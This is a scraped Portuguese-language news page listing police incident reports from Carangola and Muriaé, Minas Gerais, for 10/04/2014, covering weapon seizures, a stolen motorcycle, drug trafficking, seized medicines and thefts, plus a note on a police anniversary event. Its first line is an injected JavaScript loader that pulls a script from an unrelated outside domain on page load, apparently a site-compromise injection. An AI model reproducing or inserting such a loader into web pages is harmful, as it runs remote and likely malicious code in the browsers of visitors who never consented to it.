;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais Carangola - Muriaé - 10/04/2014 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais Carangola – Muriaé – 10/04/2014

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 10/04/2014

                         75ª CIA PM- CARANGOLA-MG

PORTE ILEGAL DE ARMA DE FOGO EM CARANGOLA-MG.

Em 09/04/2014, por volta das 06hs40min, policiais militares quando realizavam Blitz Policial, pelo distrito de Ponte Alta de Minas, Carangola-MG, abordaram o autor C.J.A.S. de 45 anos, conduzindo uma motocicleta, sendo constatado ser ele inabilitado. Os policiais então realizaram uma busca pessoal ao suspeito, sendo encontrado em sua cintura 01 revolver calibre .22, contendo 07 cartuchos intactos e outras munições em seu bolso. Diante desta situação, os policias decidiram deslocar até a residência do autor, e diante autorização de sua genitora, realizaram buscas sendo localizado uma espingarda calibre .32,  duas espingardas cartucheiras, um canivete, 13 cartuchos intactos calibre . 22, dentre outros materiais, sendo o autor preso e encaminhado a delegacia de polícia.

                        76ª CIA PM – MURIAÉ

  PORTE ILEGAL DE ARMADEFOGO EM MURIAÉ-MG.

Em 09/04/2014, por volta das 11hs14min, policiais militares sabedores de que uma motocicleta havia sido roubada na data de 08/04/2014, no bairro São Joaquim,  e de posse de informações de que tal veiculo ainda poderia estar pelas adjacências do referido bairro, realizaram uma busca próximo a caixa d’água daquela localidade onde da acesso a um pasto, local de difícil acesso, contudo insistiram nas buscas e lograram êxito em localizar o veiculo moto Honda/CG 125 fan ks, cor preta, caída ao solo e coberta por um pano amarelo no meio da pastagem, sendo que o autor seria o adolescente B.S.R., de 16 anos, inclusive os relatos davam conta que o adolescente efetuou disparos de arma de fogo contra as vitimas porém não houve feridos. Diante do início da ação policial, outros policiais militares apoiaram na ocorrência, intensificando o rastreamento na tentativa de localizar o menor infrator, o que foi feito com êxito tendo o mesmo sido localizado em uma rua do bairro São Joaquim, e em verbalização, este assumiu a autoria de fatos relatados em outros registro de ocorrências, tendo ainda entregue uma arma de ar comprimido que se encontrava escondida na casa de outro adolescente e um estojo para guardar os chumbinhos utilizados como munição da referida arma e dentro do estojo havia dois chumbinhos, arma esta utilizada pelo adolescente infrator B.S.R., de 16 anos, em sua ação delituosa. O adolescente e a espingarda de ar comprimido foram encaminhados para delegacia de polícia, já a moto recolhida ao pátio credenciado.

    TRÁFICO DE DROGAS EM MURIAÉ-MG.

Em 09/04/2014, por volta das 12hs20min, policiais militares durante patrulhamento preventivo, foram informados pela   Sala de Operações do 47º BPM, que havia uma denuncia anônima via 190, relatando que indivíduos estariam realizando trafico de drogas pelo final da Rua Marechal Floriano. Diante do exposto, deslocaram para o citado endereço e visualizaram quando próximo a uma motocicleta de cor roxa, haviam dois suspeitos em atitude suspeita, sendo realizada a abordagem, e os suspeitos identificados como R.O., de 20 anos e R.V.L.O., de 18 anos, e durante a busca pessoal no jovem de 20 anos foi localizado dentro do bolso de sua bermuda uma bucha de maconha, e dentro de sua carteira outro tablete (bucha) de maconha, enrolado em uma nota de dez reais. Segundo o jovem, encontrava-se no bairro da barra e após receber uma ligação de R.V.L.O., de 18 anos, deslocou ate aquele local á pé, para fornecer a droga aquele comprador. O comprador R.V.L.O., de 18 anos confirmou a versão do vendedor, informando que saiu do bairro Dornelas na motocicleta yamaha factor 125, de cor roxa. Compareceu ao local da ocorrência o genitor do jovem que adquiria a droga, o qual ficou como custodiante da motocicleta, sendo dada voz de prisão em flagrante delito ao autor R.O., de 20 anos pelo crime de tráfico ilícito de drogas e conduzido ára delegacia de polícia juntamente com o comprador encaminhado para maiores esclarecimentos.

APREENSÃO DE MEDICAMENTOS EM EUGENÓPOLIS-MG.

Em 09/04/14, por volta das 13hs10min, policiais militares foram  averiguar uma denuncia anonima recebida via centro de comunicações, dando conta que pela avenida Antenor Mazorche, local onde funciona um lava jato, haveria uma grande quantidade de medicamentos de procedência duvidosa. Pelo local, foi franqueada a entrada dos policiais no estabelecimento, tendo os policiais logrado exito em localizar em um comodo interno do lavador, utilizado para guardar ferramentas, grande quantidade de medicamentos com procedência  duvidosa, com vários lotes, de marcas e formulas distintas, ainda com prazo de validade a vencer.  Os envolvidos relataram que em data passada quando retornavam da cidade de  Muriaé de motocicleta pela BR 356, na altura da pedra santa maria, localizaram os referidos medicamentos as  margens da rodovia em sacolas, não sabendo da procedência dos medicamentos, tendo somente  recolhido para fins de aproveitarem em data futura , haja vista, que estavam estragando expostos  ao tempo. Diante o ocorrido os medicamentos 6.246 ( seis mil duzentos e quarenta e seis comprimidos ) juntamente com com mais 27 ( vinte e  sete) frascos de soro ringer, foram recolhidos e juntamente com os envolvidos encaminhados à delegacia de polícia para demais providências.

FURTO CONSUMADO EM CONSTRUÇAO NA CIDADE DE MURIAÉ-MG.

        Em 09/04/2014, por volta das 19hs54min, militares apos receberem informações repassada pela Sala de Operações do 47ºbpm, dando conta que um indivíduo trajando camisa vermelho e bermuda azul estaria portando uma sacola com uma fiação elétrica, os policiais lograram êxito em abordar o suspeito D.M.A., de 21 anos, residente no bairro são francisco, o qual admitiu que havia furtado o citado material em uma obra na alameda orquídeas, bairro quinta das flores sendo dada voz de prisão em flagrante delito ao acusado, sendo conduzido para a delegacia de polícia.

FURTO QUALIFICADO A ESTABELECIMENTO COMERCIAL EM MURIAÉ-MG.

Em 09/04/14, por volta das 03hs46min, policiais militares após serem acionados, compareceram à Rua Coronel Marciano Rodrigues, bairro Centro, onde acabara de ser arrombada um papelaria, sendo imediatamente iniciado um rastreamento na tentativa de localizar o autor do delito, sendo o mesmo localizado na pela Rua Independência, em um local conhecido no meio policial como ponto de venda de drogas. Assim que o autor observou a chegada dos militares, saiu em desabala carreira, sendo perseguido pela equipe policial e contido ainda na rua independência. Com o autor G.Z.P.J., de 25 anos foi localizado a quantia de $41,25 em moeda corrente, tendo os policiais militares deslocado até a loja, onde foi feito contato com a perícia que realizou os trabalhos de praxe e, que após observar as imagens das câmeras de segurança do estabelecimento, juntamente com a equipe policial, constatou que as características do indivíduo detido o identificava como o autor do delito. O autor utilizou-se de um paralelepípedo para quebrar a porta de vidro do estabelecimento e furtar a quantia aproximada de $100,00. Diante dos fatos, o autor foi conduzido incólume à delegacia para as demais providências.

 NOTA DO COMANDO

            Em decorrência da comemoração do sétimo aniversário do 47º BPM, o Comando do 47º BPM, vem por meio desta solicitar aos parceiros da imprensa, que difundam a realização de uma Ação Cívico Social a ser realizada no bairro Aeroporto, na Rua Antônio Ramos esquina com Santos Dumont, no dia 26 de abril de 2014, onde serão ofertados serviços de atendimento médico, dentário na sede do PSF, rua de lazer, corte de cabelo, dentre outras atividades sociais. O evento conta com a parceria da Prefeitura Municipal de Muriaé e demais parceiros da PMMG.

Haverá ainda a realização do 1º Passeio Ciclístico do 47º BPM, a ser realizado no dia 27/04/14, a partir das 08hs, com concentração prevista na Pça. João Pinheiro, com sorteio de bicicletas, sendo que para o sorteio os participantes deverão levar 1 quilo de alimento não perecível, onde receberão um cupom.

  ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.